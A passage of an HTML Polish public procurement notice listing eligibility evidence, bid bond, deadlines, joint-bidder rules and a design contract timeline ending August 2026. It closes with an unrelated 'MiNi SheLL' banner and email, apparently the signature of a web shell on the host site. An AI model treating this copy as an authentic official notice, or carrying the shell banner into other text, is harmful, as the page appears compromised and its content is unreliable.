spełnianiu warunków udziału w postępowaniu, w zakresie podstawy wykluczenia z postępowania wskazanej przez zamawiającego, o której mowa w:<br/>a) art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>4. Podmiotowe środki dowodowe wymienione w pkt 1. - 3. podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, potwierdzające, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu w zakresie: określonym w pkt. 1.1.1. ppkt 2), 3), 4), tj: 4.1), 4.2), 4.3) oraz w zakresie: określonym w pkt. 1.2.1.1. oraz w pkt. 1.2.1.2.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku zaoferowania przez Wykonawcę rozwiązań równoważnych, zgodnie z art. 101 ust. 5 ustawy Wykonawca może udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>2. W przypadku zaoferowania przez Wykonawcę rozwiązań równoważnych, zgodnie z art. 101 ust. 6 ustawy Wykonawca może udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy, że usługa, spełnia wymagania dotyczące wydajności lub funkcjonalności określone przez zamawiającego jeśli oferta jest zgodna z Polską Normą przenoszącą normę europejską, normami innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszącymi normy europejskie, z europejską oceną techniczną, ze wspólną specyfikacją techniczną, z normą międzynarodową lub z systemem referencji technicznych ustanowionym przez europejski organ normalizacyjny, jeżeli te normy, oceny techniczne, specyfikacje i systemy referencji technicznych dotyczą wymagań dotyczących wydajności lub funkcjonalności określonych przez zamawiającego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania.<br/>2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 1.<br/>3. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - jeżeli w ich imieniu działa osoba, której umocowanie do ich reprezentowania nie wynika z dokumentów, o których mowa w pkt 1.<br/>4. Dokumenty wymienione w pkt 1.-2. osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Składający ofertę winien wnieść wadium przed upływem terminu składania ofert, w wysokości 5 000 zł (słownie: pięć tysięcy złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, brak podstaw do wykluczenia z postępowania o udzielenie zamówienia musi zostać wykazany przez każdego z wykonawców.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający uzna warunki udziału w<br/>postępowaniu za spełnione jeżeli w zakresie określonym w pkt 5.4) ppkt.1.2.1.1. co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia dysponuje wymaganą zdolnością techniczną lub zawodową i wykona usługi, do których realizacji te uprawnienia są wymagane.<br/>2.1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający uzna warunki udziału w<br/>postępowaniu za spełnione jeżeli w zakresie określonym w pkt 5.4) ppkt. 1.2.1.2 co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia dysponuje wymaganą zdolnością techniczną lub zawodową i wykona usługi, do których realizacji te uprawnienia są wymagane.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>3.1. oświadczenie wymagane w pkt 5.5 oraz podmiotowe środki dowodowe wymagane w sekcji IX pkt 1.5. (o ile zachodzi<br/>taka okoliczność) winien złożyć każdy wykonawca. Oświadczenia potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3.2.Podmiotowe środki dowodowe wymagane w pkt IX pkt. 1.6. oraz w sekcji IX pkt. 1.7. i 1.8 winny być złożone wspólnie przez wykonawców.<br/>3.3. Dokumenty wymagane w pkt 5.11 ppkt. 1) winien złożyć każdy wykonawca.<br/>4. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>4.1. dokumenty i oświadczenia wymagane w pkt. 5.6. ppkt. 1 -3 winien złożyć każdy wykonawca.<br/>4.2. dokumenty i oświadczenia wymagane w pkt 5.7 winny być złożone wspólnie przez wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia znajdują się we wzorze umowy zamieszczonym na stronie<br/>internetowej prowadzonego postępowania https://miniportal.uzp.gov.pl <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert odbywa się elektronicznie za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wykonawcy zobowiązani są złożyć:<br/>1.1.Formularz ofertowy-w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy)<br/>oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.W formularzu ofertowym Wykonawca<br/>zobowiązany jest podać adres skrzynki ePUAP,na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>1.2. Formularz wyceny<br/>1.3. Informacja o częściach zamówienia, których wykonanie, wykonawca zamierza powierzyć podwykonawcom, oraz nazwach ewentualnych podwykonawców,jeżeli są już znani - w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom<br/>1.4. Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby – w przypadku polegania przez<br/>wykonawcę na zdolnościach lub sytuacji podmiotów udostępniających zasoby, w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>1.5. Podmiotowe środki dowodowe, wykazujące przesłanki określone w art. 110 ust. 2,w przypadku zajścia okoliczności określonych w art. 108 ust. 1 pkt 1,2,5 ustawy Pzp<br/>1.6. Oświadczenie, z którego wynika,które usługi, wykonają poszczególni wykonawcy–w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>1.7. Wykonawca,który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa,wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, winno potwierdzać,<br/>że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów<br/>oraz określa w szczególności:<br/>1)zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3)czy i w jakim zakresie podmiot udostępniający zasoby,na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,zrealizuje roboty<br/>budowlane lub usługi,których wskazane zdolności dotyczą.<br/>1.8. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu w zakresie: określonym w pkt 5.4) ppkt. 1.1.1. a)<br/>1.9. Wykaz imion i nazwisk osób wykonujących czynności przy realizacji zamówienia.<br/>2.Termin wykonania zamówienia– 31 sierpnia 2026 r., w tym:<br/>1) projekt koncepcyjny - 8 miesięcy licząc od daty zawarcia umowy,<br/>2) dokumentacja i opinia geotechniczna oraz hydrogeologiczna, projekty budowlane oraz projekty rozbiórek i informacje BIOZ – 12 miesięcy licząc od daty zawarcia umowy,<br/>3) projekty wykonawcze, technologiczne i pozostałe opracowania – elementy dokumentacji projektowo - kosztorysowej im towarzyszące – 18 miesięcy licząc od daty zawarcia umowy,<br/>4) dokumentacja środowiskowa, w tym raport oddziaływania na środowisko – 10 miesięcy licząc od daty zawarcia umowy,<br/> 5) pełnienie kompleksowych nadzorów autorskich - od dnia rozpoczęcia robót budowlanych realizowanych w oparciu o dokumentację projektową stanowiącą przedmiot zamówienia, do dnia podpisania protokołu odbioru końcowego tych robót, jednak nie dłużej niż 30 dni od dnia zakończenia robót budowlanych i zgłoszenia gotowości do odbioru końcowego przez kierownika budowy tj. do dnia 31 sierpnia 2026 r

Creat By MiNi SheLL
Email: jattceo@gmail.com